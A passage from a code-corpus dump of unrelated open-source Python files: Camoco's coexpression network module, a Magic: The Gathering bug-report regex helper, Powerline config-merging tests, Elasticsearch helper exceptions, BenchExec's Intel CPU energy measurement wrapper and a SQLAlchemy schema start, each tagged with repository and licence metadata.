self.log("Ordering rows by MCL cluster")
order = (
self.clusters.loc[dm.index]
.fillna(np.inf)
.sort_values(by="cluster")
.index.values
)
dm = dm.loc[order, :]
else:
# No cluster order.
self.log("Unknown gene ordering: {}, no ordering performed", cluster_method)
# Get leaves of accessions
if cluster_accessions:
if cluster_method == "mcl":
acc_clus_method = "ward"
else:
acc_clus_method = cluster_method
accession_linkage = fastcluster.linkage(
dm.fillna(0).T, method=acc_clus_method
)
# Re-order the matrix based on tree
order = leaves_list(accession_linkage)
dm = dm.iloc[:, order]
# Save plot if provided filename
if ax is None:
fig = plt.figure(facecolor="white", figsize=figsize,constrained_layout=True)
ax = fig.add_subplot(111)
if plot_dendrogram == True:
gs = fig.add_gridspec(
2, 2, height_ratios=[3, 1], width_ratios=[3, 1], hspace=0, wspace=0
)
ax = plt.subplot(gs[0])
# make the axes for the dendrograms
gene_ax = plt.subplot(gs[1])
gene_ax.set_xticks([])
gene_ax.set_yticks([])
accession_ax = plt.subplot(gs[2])
# Plot the Expression matrix
nan_mask = np.ma.array(dm, mask=np.isnan(dm))
if cmap is None:
cmap = self._cmap
else:
cmap = plt.get_cmap(cmap)
            # Set the nan color to the middle unless a color is specified
if nan_color is None:
nan_color = cmap(0.5)
cmap.set_bad(nan_color, 1.0)
vmax = max(np.nanmin(abs(dm)), np.nanmax(abs(dm)))
vmin = vmax * -1
im = ax.matshow(nan_mask, aspect="auto", cmap=cmap, vmax=vmax, vmin=vmin)
# Intelligently add labels
ax.grid(False)
ax.tick_params(labelsize=8)
if (
(include_accession_labels is None and len(dm.columns) < 60)
or include_accession_labels == True
):
ax.set(xticklabels=dm.columns.values, yticklabels=dm.index.values)
ax.tick_params("x", labelrotation=45)
for label in ax.get_xticklabels():
label.set_horizontalalignment('left')
ax.set(xticks=np.arange(len(dm.columns)))
if (
(include_gene_labels is None and len(dm.index) < 100)
or include_gene_labels == True
):
ax.set(yticks=np.arange(len(dm.index)))
fig.align_labels()
# ax.figure.colorbar(im)
if plot_dendrogram == True:
with plt.rc_context({"lines.linewidth": 1.0}):
from scipy.cluster import hierarchy
hierarchy.set_link_color_palette(["k"])
# Plot the accession dendrogram
import sys
if cluster_accessions == True:
sys.setrecursionlimit(10000)
dendrogram(
accession_linkage,
ax=accession_ax,
color_threshold=np.inf,
orientation="bottom",
)
accession_ax.set_facecolor("w")
accession_ax.set_xticks([])
accession_ax.set_yticks([])
# Plot the gene dendrogram
if cluster_method in hier_cluster_methods:
dendrogram(
expr_linkage,
ax=gene_ax,
orientation="right",
color_threshold=np.inf,
)
gene_ax.set_xticks([])
gene_ax.set_yticks([])
gene_ax.set_facecolor("w")
# Save if you wish
if filename is not None:
            plt.savefig(filename, dpi=300)
plt.close()
return ax.figure
def plot_scores(self, filename=None, pcc=True, bins=50):
"""
Plot the histogram of PCCs.
Parameters
----------
filename : str (default: None)
The output filename, if none will return the matplotlib object
pcc : bool (default:True)
flag to convert scores to pccs
bins : int (default: 50)
the number of bins in the histogram
"""
fig = plt.figure(figsize=(8, 6))
# grab the scores only and put in a
# np array to save space (pandas DF was HUGE)
scores = odo(self.coex.score, np.ndarray)[~np.isnan(self.coex.score)]
if pcc:
self.log("Transforming scores")
scores = (scores * float(self._global("pcc_std"))) + float(
self._global("pcc_mean")
)
# Transform Z-scores to pcc scores (inverse fisher transform)
scores = np.tanh(scores)
plt.hist(scores, bins=bins)
        plt.xlabel("PCC" if pcc else "Z-Score")
plt.ylabel("Freq")
if filename is not None:
plt.savefig(filename)
plt.close()
else:
return fig
def compare_degree(self, obj, diff_genes=10, score_cutoff=3):
"""
Compares the degree of one COB to another.
Parameters
----------
obj : COB instance
The object you are comparing the degree to.
diff_genes : int (default: 10)
The number of highest and lowest different
genes to report
score_cutoff : int (default: 3)
            The edge score cutoff used to call an
            edge significant.
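        Example (illustrative; assumes ``cob`` and ``other_cob`` are COB
        instances built on the same reference genome)
        >>> stats = cob.compare_degree(other_cob, diff_genes=10)
        >>> corr = stats['correlation_between_cobs']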
"""
self.log("Comparing degrees of {} and {}", self.name, obj.name)
# Put the two degree tables in the same table
lis = pd.concat(
[self.degree.copy(), obj.degree.copy()], axis=1, ignore_index=True
)
# Filter the table of entries to ones where both entries exist
lis = lis[(lis[0] > 0) & (lis[1] > 0)]
delta = lis[0] - lis[1]
        # Find the stats between the two sets,
# and the genes with the biggest differences
delta.sort_values(ascending=False, inplace=True)
highest = sorted(
list(dict(delta[:diff_genes]).items()), key=lambda x: x[1], reverse=True
)
lowest = sorted(
list(dict(delta[-diff_genes:]).items()), key=lambda x: x[1], reverse=False
)
ans = {
"correlation_between_cobs": lis[0].corr(lis[1]),
"mean_of_difference": delta.mean(),
"std_of_difference": delta.std(),
("bigger_in_" + self.name): highest,
("bigger_in_" + obj.name): lowest,
}
return ans
""" ----------------------------------------------------------------------
Internal Methods
"""
def _calculate_coexpression(self, significance_thresh=3):
"""
Generates pairwise PCCs for gene expression profiles in self._expr.
Also calculates pairwise gene distance.
"""
# 1. Calculate the PCCs
self.log("Calculating Coexpression")
num_bytes_needed = comb(self.shape()[0], 2) * 8
if num_bytes_needed > psutil.virtual_memory().available:
raise MemoryError("Not enough RAM to calculate co-expression network")
        # pass in a contiguous array to the cython function to calculate PCCs
pccs = PCCUP.pair_correlation(
np.ascontiguousarray(
# PCCUP expects floats
self._expr.as_matrix().astype("float")
)
)
self.log("Applying Fisher Transform")
pccs[pccs >= 1.0] = 0.9999999
pccs[pccs <= -1.0] = -0.9999999
pccs = np.arctanh(pccs)
gc.collect()
# Do a PCC check to make sure they are not all NaNs
if not any(np.logical_not(np.isnan(pccs))):
raise ValueError(
"Not enough data is available to reliably calculate co-expression, "
"please ensure you have more than 10 accessions to calculate correlation coefficient"
)
self.log("Calculating Mean and STD")
        # Sometimes, with certain datasets, the NaN masks overlap
        # completely for two genes' expression data, making their PCC a NaN.
        # This affects the mean and std for the gene.
pcc_mean = np.ma.masked_array(pccs, np.isnan(pccs)).mean()
self._global("pcc_mean", pcc_mean)
gc.collect()
pcc_std = np.ma.masked_array(pccs, np.isnan(pccs)).std()
self._global("pcc_std", pcc_std)
gc.collect()
# 2. Calculate Z Scores
self.log("Finding adjusted scores")
pccs = (pccs - pcc_mean) / pcc_std
gc.collect()
# 3. Build the dataframe
self.log("Build the dataframe and set the significance threshold")
self._global("significance_threshold", significance_thresh)
raw_coex = self._raw_coex(pccs, significance_thresh)
del pccs
gc.collect()
# 4. Calculate Gene Distance
self.log("Calculating Gene Distance")
raw_coex.addcol(
self.refgen.pairwise_distance(
gene_list=self.refgen.from_ids(self._expr.index)
),
pos=1,
name="distance",
)
gc.collect()
# 5. Cleanup
raw_coex.flush()
del raw_coex
gc.collect()
# 6. Load the new table into the object
self.coex = self._bcolz("coex", blaze=True)
self.set_sig_edge_zscore(float(self._global("significance_threshold")))
self.log("Done")
return self
def _calculate_degree(self, update_db=True):
"""
Calculates degrees of genes within network.
"""
self.log("Building Degree")
# Get significant expressions and dump coex from memory for time being
# Generate a df that starts all genes at 0
names = self._expr.index.values
self.degree = pd.DataFrame(0, index=names, columns=["Degree"])
# Get the index and find the counts
self.log("Calculating Gene degree")
sigs = np.arange(len(self.coex))[odo(self.coex.significant, np.ndarray)]
sigs = PCCUP.coex_expr_index(sigs, len(self._expr.index.values))
sigs = list(Counter(chain(*sigs)).items())
if len(sigs) > 0:
# Translate the expr indexes to the gene names
for i, degree in sigs:
self.degree.ix[names[i]] = degree
# Update the database
if update_db:
self._bcolz("degree", df=self.degree)
# Cleanup
del sigs
del names
gc.collect()
return self
def _calculate_gene_hierarchy(self, method="single"):
"""
Calculate the hierarchical gene distance for the Expr matrix
using the coex data.
Notes
-----
        This is kind of expensive.
"""
import fastcluster
# We need to recreate the original PCCs
self.log("Calculating hierarchical clustering using {}".format(method))
if len(self.coex) == 0:
raise ValueError("Cannot calculate leaves without coex")
pcc_mean = float(self._global("pcc_mean"))
pcc_std = float(self._global("pcc_std"))
# Get score column and dump coex from memory for time being
dists = odo(self.coex.score, np.ndarray)
# Subtract pccs from 1 so we do not get negative distances
dists = (dists * pcc_std) + pcc_mean
dists = np.tanh(dists)
dists = 1 - dists
# convert nan to 0's, linkage can only use finite values
dists[np.isnan(dists)] = 0
gc.collect()
# Find the leaves from hierarchical clustering
gene_link = fastcluster.linkage(dists, method=method)
return gene_link
def _calculate_leaves(self, method="single"):
"""
This calculates the leaves of the dendrogram from the coex
"""
gene_link = self._calculate_gene_hierarchy(method=method)
self.log("Finding the leaves")
leaves = leaves_list(gene_link)
gc.collect()
# Put them in a dataframe and stow them
self.leaves = pd.DataFrame(leaves, index=self._expr.index, columns=["index"])
self._gene_link = gene_link
self._bcolz("leaves", df=self.leaves)
# Cleanup and reinstate the coex table
gc.collect()
return self
def _calculate_clusters(self):
"""
Calculates global clusters
"""
clusters = self.mcl()
self.log("Building cluster dataframe")
names = self._expr.index.values
self.clusters = pd.DataFrame(np.nan, index=names, columns=["cluster"])
if len(clusters) > 0:
self.clusters = pd.DataFrame(
data=[
(gene.id, i)
for i, cluster in enumerate(clusters)
for gene in cluster
],
columns=["Gene", "cluster"],
).set_index("Gene")
self._bcolz("clusters", df=self.clusters)
self.log("Creating Cluster Ontology")
terms = []
for i, x in enumerate(self.clusters.groupby("cluster")):
genes = self.refgen[x[1].index.values]
terms.append(
Term(
"MCL{}".format(i),
desc="{} MCL Cluster {}".format(self.name, i),
loci=genes,
)
)
self.MCL = Ontology.from_terms(
terms,
"{}MCL".format(self.name),
"{} MCL Clusters".format(self.name),
self.refgen,
)
self.log("Finished finding clusters")
return self
def _coex_concordance(self, gene_a, gene_b, maxnan=10, return_dict=False):
"""
This is a sanity method to ensure that the pcc calculated
directly from the expr profiles matches the one stored in
the database
"""
expr_a = self.expr_profile(gene_a).values
expr_b = self.expr_profile(gene_b).values
mask = np.logical_and(np.isfinite(expr_a), np.isfinite(expr_b))
if sum(mask) < maxnan:
# too many nans to reliably calculate pcc
return np.nan
r = pearsonr(expr_a[mask], expr_b[mask])[0]
# fisher transform it
z = np.arctanh(r - 0.0000001)
# standard normalize it
z = (z - float(self._global("pcc_mean"))) / float(self._global("pcc_std"))
if return_dict:
return {'pearsonr': r, 'zscore': z}
else:
return z
def _sparse_fruchterman_reingold(
self,
A,
k=None,
pos=None,
fixed=None,
iterations=50,
threshold=1e-4,
seed=42
):
'''
This code was modified from the NetworkX algorithm for
sparse_fruchterman_reingold spring embedded algorithm.
See the following page for details on the source:
https://github.com/networkx/networkx/blob/15e17c0a2072ea56df3d9cd9152ee682203e8cd9/networkx/drawing/layout.py#L502
=======
NetworkX is distributed with the 3-clause BSD license.
::
Copyright (C) 2004-2020, NetworkX Developers
Aric Hagberg <hagberg@lanl.gov>
Dan Schult <dschult@colgate.edu>
Pieter Swart <swart@lanl.gov>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the NetworkX Developers nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
try:
nnodes, _ = A.shape
except AttributeError:
msg = "fruchterman_reingold() takes an adjacency matrix as input"
raise ValueError(msg)
# Create random positions based on the seed
if pos is None:
# random initial positions
            pos = np.asarray(
                np.random.RandomState(seed).rand(nnodes, 2),
                dtype=A.dtype
            )
else:
# make sure positions are of same type as matrix
pos = pos.astype(A.dtype)
# optimal distance between nodes
if k is None:
k = np.sqrt(1.0 / nnodes)
# the initial "temperature" is about .1 of domain area (=1x1)
# this is the largest step allowed in the dynamics.
# We need to calculate this in case our fixed positions force our domain
# to be much bigger than 1x1
t = max(max(pos.T[0]) - min(pos.T[0]), max(pos.T[1]) - min(pos.T[1])) * 0.1
# simple cooling scheme.
# linearly step down by dt on each iteration so last iteration is size dt.
dt = t / float(iterations + 1)
delta = np.zeros((pos.shape[0], pos.shape[0], pos.shape[1]), dtype=A.dtype)
# the inscrutable (but fast) version
# this is still O(V^2)
# could use multilevel methods to speed this up significantly
for iteration in range(iterations):
self.log(f"On iteration {iteration}")
# matrix of difference between points
delta = pos[:, np.newaxis, :] - pos[np.newaxis, :, :]
# distance between points
distance = np.linalg.norm(delta, axis=-1)
# enforce minimum distance of 0.01
np.clip(distance, 0.01, None, out=distance)
# displacement "force"
displacement = np.einsum('ijk,ij->ik',
delta,
(k * k / distance**2 - A * distance / k))
# update positions
length = np.linalg.norm(displacement, axis=-1)
length = np.where(length < 0.01, 0.1, length)
delta_pos = np.einsum('ij,i->ij', displacement, t / length)
if fixed is not None:
# don't change positions of fixed nodes
delta_pos[fixed] = 0.0
pos += delta_pos
# cool temperature
t -= dt
err = np.linalg.norm(delta_pos) / nnodes
if err < threshold:
break
return pos
""" -----------------------------------------------------------------------
Class Methods -- Factory Methods
"""
@classmethod
def create(cls, name, description, refgen):
"""
"""
self = super().create(name, description, refgen)
self._bcolz("gene_qc_status", df=pd.DataFrame())
self._bcolz("accession_qc_status", df=pd.DataFrame())
self._bcolz("coex", df=pd.DataFrame())
self._bcolz("degree", df=pd.DataFrame())
self._bcolz("mcl_cluster", df=pd.DataFrame())
self._bcolz("leaves", df=pd.DataFrame())
self._expr_index = defaultdict(
lambda: None, {gene: index for index, gene in enumerate(self._expr.index)}
)
return self
@classmethod
def from_Expr(cls, expr, zscore_cutoff=3, **kwargs):
"""
        Create a COB instance from a camoco.Expr (Expression) instance.
        A COB inherits all the methods of an Expr instance and implements
        additional coexpression specific methods. This method accepts an
        already built Expr instance and then performs the additional
        computations needed to build a full fledged COB instance.
Parameters
----------
expr : camoco.Expr
The camoco expression object used to build the
co-expression network.
        zscore_cutoff : int (default: 3)
The zscore cutoff for the network.
Returns
-------
camoco.COB instance
"""
# The Expr object already exists, just get a handle on it
self = expr
self._calculate_coexpression()
self._calculate_degree()
self._calculate_leaves()
self._calculate_clusters()
return self
@classmethod
def from_DataFrame(
cls, df, name, description, refgen, rawtype=None, zscore_cutoff=3, **kwargs
):
"""
        This method takes a pandas DataFrame and builds the Expr object,
        passing all keyword arguments in ``**kwargs``
        to the classmethod Expr.from_DataFrame(...). See additional
        ``**kwargs`` in COB.from_Expr(...)
Parameters
----------
df : pandas.DataFrame
A Pandas dataframe containing the expression information.
Assumes gene names are in the index while accessions
(experiments) are stored in the columns.
name : str
Name of the dataset stored in camoco database
description : str
Short string describing the dataset
refgen : camoco.RefGen
A Camoco refgen object which describes the reference
genome referred to by the genes in the dataset. This
            is cross referenced during import so we can pull information
about genes we are interested in during analysis.
rawtype : str (default: None)
            This is noted here to reinforce the importance of the rawtype
passed to camoco.Expr.from_DataFrame. See docs there
for more information.
        zscore_cutoff : int (default: 3)
The zscore cutoff for the network.
\*\*kwargs : key,value pairs
additional parameters passed to subsequent methods.
(see Expr.from_DataFrame)
"""
# Create a new Expr object from a data frame
expr = super().from_DataFrame(
df,
name,
description,
refgen,
rawtype,
zscore_cutoff=zscore_cutoff,
**kwargs,
)
return cls.from_Expr(expr)
@classmethod
def from_table(
cls,
filename,
name,
description,
refgen,
rawtype=None,
sep="\t",
index_col=None,
zscore_cutoff=3,
**kwargs,
):
"""
        Build a COB Object from an FPKM or Microarray CSV. This is a
convenience method which handles reading in of tables.
Files need to have gene names as the first column and
accession (i.e. experiment) names as the first row. All
kwargs will be passed to COB.from_DataFrame(...). See
docstring there for option descriptions.
Parameters
----------
filename : str (path)
the path to the FPKM table in csv or tsv
name : str
Name of the dataset stored in camoco database
description : str
Short string describing the dataset
refgen : camoco.RefGen
A Camoco refgen object which describes the reference
genome referred to by the genes in the dataset. This
            is cross referenced during import so we can pull information
about genes we are interested in during analysis.
rawtype : str (default: None)
This is noted here to reinforce the importance of the rawtype
passed to camoco.Expr.from_DataFrame. See docs there for
more information.
sep : str (default: \\t)
Specifies the delimiter of the file referenced by the
filename parameter.
index_col : str (default: None)
If not None, this column will be set as the gene index
column. Useful if there is a column name in the text file
for gene names.
        zscore_cutoff : int (default: 3)
The zscore cutoff for the network.
**kwargs : key value pairs
additional parameters passed to subsequent methods.
Returns
-------
a COB object
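        Example (illustrative sketch; the file path, dataset names, and
        rawtype are hypothetical, and ``refgen`` is an existing
        camoco.RefGen instance)
        >>> cob = COB.from_table(
        ...     'expr_fpkm.tsv',
        ...     name='MyNetwork',
        ...     description='Example co-expression network',
        ...     refgen=refgen,
        ...     rawtype='RNASEQ',
        ...     index_col='GeneID'
        ... )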
"""
df = pd.read_table(filename, sep=sep, compression="infer", index_col=index_col)
return cls.from_DataFrame(
df,
name,
description,
refgen,
rawtype=rawtype,
zscore_cutoff=zscore_cutoff,
**kwargs,
)
def fix_val(val):
    # Use the numpy checks so this works on numpy floats as well
    if np.isinf(val):
        return -1
    if np.isnan(val):
        # JSON has no representation for NaN
        return "null"
    else:
        return val
|
schae234/Camoco
|
camoco/COB.py
|
Python
|
mit
| 95,136
|
import itertools
import re
from typing import Any, Iterable, List, Match, Optional
METACATS = ['Cardset', 'Collection', 'Deck Building', 'Duel Scene', 'Leagues', 'Play Lobby', 'Trade']
CATEGORIES = ['Advantageous', 'Disadvantageous', 'Game Breaking', 'Avoidable Game Breaking', 'Graphical', 'Non-Functional ability']
BADCATS = ['Game Breaking']
CODE_REGEX = r'^Code: (.*)$'
BBT_REGEX = r'^Bug Blog Text: (.*)$'
DISCORD_REGEX = r'^Reported on Discord by (\w+#[0-9]+)$'
IMAGES_REGEX = r'^<!-- Images --> (.*)$'
REGEX_CARDREF = r'\[?\[([^\]]*)\]\]?'
REGEX_SEARCHREF = r'\{\{\{([\w:/^$" ]+)\}\}\}'
REGEX_BBCAT = r'^([\w ]+) ?(\([\w, ]+\))?'
BAD_AFFECTS_REGEX = r'Affects: (\[Card Name\]\(, \[Second Card name\], etc\)\r?\n)\['
FEEDBACK_LINK_REGEX = r'((http|https)\:\/\/)?feedback.wizards.com/forums/([a-zA-Z0-9\.\&\/\?\:@\-_=#])*'
def remove_smartquotes(text: str) -> str:
return text.replace('’', "'").replace('“', '"').replace('”', '"')
def strip_squarebrackets(title: str) -> str:
def get_name(match: Match[str]) -> str:
return match.group(1).strip()
title = re.sub(REGEX_CARDREF, get_name, title)
return title
def grouper(n: int, iterable: Iterable, fillvalue: Any = None) -> Iterable:
"""grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"""
args = [iter(iterable)] * n
return itertools.zip_longest(*args, fillvalue=fillvalue)
def get_cards_from_string(item: str) -> List[str]:
cards = re.findall(REGEX_CARDREF, item)
return cards
def set_body_field(body: str, field: str, value: str) -> str:
regex = r'^' + field + r': (.*)$'
line = f'{field}: {value}'
m = re.search(regex, body, re.MULTILINE)
if m:
return re.sub(regex, line, body, flags=re.MULTILINE)
return f'{body}\n{line}'
def get_body_field(body: str, field: str) -> Optional[str]:
regex = r'^' + field + r': (.*)$'
m = re.search(regex, body, re.MULTILINE)
if m:
return m.group(1)
return None
|
PennyDreadfulMTG/Penny-Dreadful-Tools
|
modo_bugs/strings.py
|
Python
|
gpl-3.0
| 1,958
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
import json
from subprocess import check_call
from operator import add
from functools import reduce
from shutil import rmtree
from powerline.lib.dict import mergedicts_copy as mdc
from powerline import Powerline
from tests import TestCase
from tests.lib.config_mock import select_renderer, UT
CONFIG_DIR = 'tests/config'
root_config = lambda: {
'common': {
'interval': None,
'watcher': 'auto',
},
'ext': {
'test': {
'theme': 'default',
'colorscheme': 'default',
},
},
}
colors_config = lambda: {
'colors': {
'c1': 1,
'c2': 2,
},
'gradients': {
},
}
colorscheme_config = lambda: {
'groups': {
'g': {'fg': 'c1', 'bg': 'c2', 'attrs': []},
}
}
theme_config = lambda: {
'segment_data': {
's': {
'before': 'b',
},
},
'segments': {
'left': [
{
'type': 'string',
'name': 's',
'contents': 't',
'highlight_groups': ['g'],
},
],
'right': [],
}
}
top_theme_config = lambda: {
'dividers': {
'left': {
'hard': '#>',
'soft': '|>',
},
'right': {
'hard': '<#',
'soft': '<|',
},
},
'spaces': 0,
}
main_tree = lambda: {
'1/config': root_config(),
'1/colors': colors_config(),
'1/colorschemes/default': colorscheme_config(),
'1/themes/test/default': theme_config(),
'1/themes/' + UT: top_theme_config(),
'1/themes/other1': mdc(top_theme_config(), {
'dividers': {
'left': {
'hard': '!>',
}
}
}),
'1/themes/other2': mdc(top_theme_config(), {
'dividers': {
'left': {
'hard': '>>',
}
}
}),
}
def mkdir_recursive(directory):
if os.path.isdir(directory):
return
mkdir_recursive(os.path.dirname(directory))
os.mkdir(directory)
class TestPowerline(Powerline):
def get_config_paths(self):
return tuple(sorted([
os.path.join(CONFIG_DIR, d)
for d in os.listdir(CONFIG_DIR)
]))
class WithConfigTree(object):
__slots__ = ('tree', 'p', 'p_kwargs')
def __init__(self, tree, p_kwargs={'run_once': True}):
self.tree = tree
self.p = None
self.p_kwargs = p_kwargs
def __enter__(self, *args):
os.mkdir(CONFIG_DIR)
for k, v in self.tree.items():
fname = os.path.join(CONFIG_DIR, k) + '.json'
mkdir_recursive(os.path.dirname(fname))
with open(fname, 'w') as F:
json.dump(v, F)
select_renderer(simpler_renderer=True)
self.p = TestPowerline(
ext='test',
renderer_module='tests.lib.config_mock',
**self.p_kwargs
)
if os.environ.get('POWERLINE_RUN_LINT_DURING_TESTS'):
try:
check_call(['scripts/powerline-lint'] + reduce(add, (
['-p', d] for d in self.p.get_config_paths()
)))
except:
self.__exit__()
raise
return self.p.__enter__(*args)
def __exit__(self, *args):
try:
rmtree(CONFIG_DIR)
finally:
if self.p:
self.p.__exit__(*args)
class TestMerging(TestCase):
def assertRenderEqual(self, p, output, **kwargs):
self.assertEqual(p.render(**kwargs).replace(' ', ' '), output)
def test_not_merged_config(self):
with WithConfigTree(main_tree()) as p:
self.assertRenderEqual(p, '{12} bt{2-}#>{--}')
def test_root_config_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/config': {
'common': {
'default_top_theme': 'other1',
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt{2-}!>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/config': {
'common': {
'default_top_theme': 'other1',
}
},
'3/config': {
'common': {
'default_top_theme': 'other2',
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt{2-}>>{--}')
def test_top_theme_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/themes/' + UT: {
'spaces': 1,
},
'3/themes/' + UT: {
'dividers': {
'left': {
'hard': '>>',
}
}
},
})) as p:
self.assertRenderEqual(p, '{12} bt {2-}>>{--}')
def test_colors_config_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
})) as p:
self.assertRenderEqual(p, '{32} bt{2-}#>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
'3/colors': {
'colors': {
'c1': 4,
}
},
})) as p:
self.assertRenderEqual(p, '{42} bt{2-}#>{--}')
with WithConfigTree(mdc(main_tree(), {
'2/colors': {
'colors': {
'c1': 3,
}
},
'3/colors': {
'colors': {
'c2': 4,
}
},
})) as p:
self.assertRenderEqual(p, '{34} bt{4-}#>{--}')
def test_colorschemes_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/colorschemes/default': {
'groups': {
'g': {'fg': 'c2', 'bg': 'c1', 'attrs': []},
}
},
})) as p:
self.assertRenderEqual(p, '{21} bt{1-}#>{--}')
def test_theme_merging(self):
with WithConfigTree(mdc(main_tree(), {
'2/themes/test/default': {
'segment_data': {
's': {
'after': 'a',
}
}
},
})) as p:
self.assertRenderEqual(p, '{12} bta{2-}#>{--}')
if __name__ == '__main__':
from tests import main
main()
|
S0lll0s/powerline
|
tests/test_config_merging.py
|
Python
|
mit
| 5,077
|
# Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import Any, Dict, List
class BulkIndexError(Exception):
def __init__(self, message: Any, errors: List[Dict[str, Any]]):
super().__init__(message)
self.errors: List[Dict[str, Any]] = errors
class ScanError(Exception):
scroll_id: str
def __init__(self, scroll_id: str, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
self.scroll_id = scroll_id
|
elastic/elasticsearch-py
|
elasticsearch/helpers/errors.py
|
Python
|
apache-2.0
| 1,213
|
# BenchExec is a framework for reliable benchmarking.
# This file is part of BenchExec.
#
# Copyright (C) 2007-2015 Dirk Beyer
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# prepare for Python 3
from __future__ import absolute_import, division, print_function, unicode_literals
# THIS MODULE HAS TO WORK WITH PYTHON 2.7!
import collections
import logging
import os
import subprocess
import signal
import re
from benchexec.util import find_executable
from decimal import Decimal
DOMAIN_PACKAGE = "package"
DOMAIN_CORE = "core"
DOMAIN_UNCORE = "uncore"
DOMAIN_DRAM = "dram"
class EnergyMeasurement(object):
def __init__(self, executable):
self._executable = executable
self._measurement_process = None
@classmethod
def create_if_supported(cls):
executable = find_executable('cpu-energy-meter', exitOnError=False, use_current_dir=False)
if executable is None: # not available on current system
logging.debug('Energy measurement not available because cpu-energy-meter binary could not be found.')
return None
return cls(executable)
def start(self):
"""Starts the external measurement program."""
assert not self.is_running(), 'Attempted to start an energy measurement while one was already running.'
self._measurement_process = subprocess.Popen(
[self._executable, '-r'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=10000,
preexec_fn=os.setpgrp, # Prevent delivery of Ctrl+C to subprocess
)
def stop(self):
"""Stops the external measurement program and returns the measurement result,
if the measurement was running."""
consumed_energy = collections.defaultdict(dict)
if not self.is_running():
return None
# cpu-energy-meter expects SIGINT to stop and report its result
self._measurement_process.send_signal(signal.SIGINT)
(out, err) = self._measurement_process.communicate()
assert self._measurement_process.returncode is not None
if self._measurement_process.returncode:
logging.debug(
"Energy measurement terminated with return code %s",
self._measurement_process.returncode)
self._measurement_process = None
for line in err.splitlines():
logging.debug("energy measurement stderr: %s", line)
for line in out.splitlines():
line = line.decode('ASCII')
logging.debug("energy measurement output: %s", line)
            match = re.match(r'cpu(\d+)_([a-z]+)_joules=(\d+\.?\d*)', line)
if not match:
continue
cpu, domain, energy = match.groups()
cpu = int(cpu)
energy = Decimal(energy)
consumed_energy[cpu][domain] = energy
return consumed_energy
def is_running(self):
"""Returns True if there is currently an instance of the external measurement program running, False otherwise."""
return self._measurement_process is not None
def format_energy_results(energy):
"""Take the result of an energy measurement and return a flat dictionary that contains all values."""
if not energy:
return {}
result = {}
cpuenergy = Decimal(0)
for pkg, domains in energy.items():
for domain, value in domains.items():
if domain == DOMAIN_PACKAGE:
cpuenergy += value
result['cpuenergy-pkg{}'.format(pkg)] = value
else:
result['cpuenergy-pkg{}-{}'.format(pkg, domain)] = value
result['cpuenergy'] = cpuenergy
result = collections.OrderedDict(sorted(result.items()))
return result
|
martin-neuhaeusser/benchexec
|
benchexec/intel_cpu_energy.py
|
Python
|
apache-2.0
| 4,296
|
"""
DDL and other schema creational operations for TPOT transactional tables
holding pre-aggregated data for outcomes analysis
"""
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, ForeignKey, Integer, Float, String, Boolean, Date
from sqlalchemy.orm import relationship
Base = declarative_base()
class Participant(Base):
__tablename__ = 'participant'
participant_id = Column(Integer, primary_key=True)
wioa_participant = Column(Boolean, nullable=False, default=False)
wioa_lta_participant = Column(Boolean, nullable=False, default=False)
wages = relationship('Wage', backref='participant')
programs = relationship('Program', secondary='participant_program')
class Program(Base):
__tablename__ = 'program'
program_cip = Column(Integer, primary_key=True)
name = Column(String(140), nullable=False)
potential_outcome_id = Column(Integer, ForeignKey('outcome.potential_outcome_id'))
participants = relationship('Participant', secondary='participant_program')
providers = relationship('Provider', secondary='program_provider')
